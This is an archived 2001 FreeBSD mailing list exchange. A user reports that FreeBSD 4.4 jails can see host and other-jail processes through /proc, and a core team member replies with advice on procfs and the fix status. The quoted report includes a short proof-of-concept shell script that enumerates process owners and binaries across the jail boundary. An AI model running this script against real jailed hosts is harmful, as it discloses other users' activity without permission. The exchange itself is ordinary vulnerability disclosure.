From owner-freebsd-hackers Tue Oct 30 14: 1:31 2001 Delivered-To: freebsd-hackers@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 8938A37B401 for ; Tue, 30 Oct 2001 14:01:27 -0800 (PST) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.11.6/8.11.5) with SMTP id f9UM1HB68319; Tue, 30 Oct 2001 17:01:18 -0500 (EST) (envelope-from robert@fledge.watson.org) Date: Tue, 30 Oct 2001 17:01:16 -0500 (EST) From: Robert Watson X-Sender: robert@fledge.watson.org To: opr Cc: freebsd-hackers@freebsd.org Subject: Re: jail's /proc In-Reply-To: <20011029183626.36f8e686.opr@bsdaemon.be> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is fixed in 5.0-CURRENT, but the architectural improvements to support the fix have not been merged, since they're still in flux. My general advice is to not mount procfs on systems with untrusted users. It's almost possible to not lose functionality in doing that -- I understand DES has patches to truss to make it use ptrace(), which is the last remaining instance I can think of. (actually, I think ps -e requires procfs still) Robert N M Watson FreeBSD Core Team, TrustedBSD Project robert@fledge.watson.org NAI Labs, Safeport Network Services On Mon, 29 Oct 2001, opr wrote: > > Hello, > > i really have no clue if i should mail this to you guys, but we've found some issue's in de jail's /proc. We were able to find information about processes running outside the jail, or running in other jails. > eg. when i run sshd in the host system, and it has PID 655, i can login on the jail, and by execution "ls -l /proc/665/file" i can see what binary is running on pid 655. So any user of the jail system can see what processes you run on that server. I'm running FreeBSD 4.4-RELEASE on a i386. > > greetz, > > Pieter Danhieux > > Proof of concept shellscript: > > #!/bin/sh > _COUNT=0; > while [ $_COUNT -le 65000 ]; > do > if [ -f /proc/$_COUNT/file ]; > then > _USER=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f4`; > _PROC=`/bin/ls -l /proc/$_COUNT/file | cut -d" " -f14`; > echo "PID= $_TELLER USER= $_USER PROC= $_PROC"; > fi > _COUNT=`expr $_COUNT + 1`; > done > > ----------------- > [www.bsdaemon.be] > ----------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-hackers" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message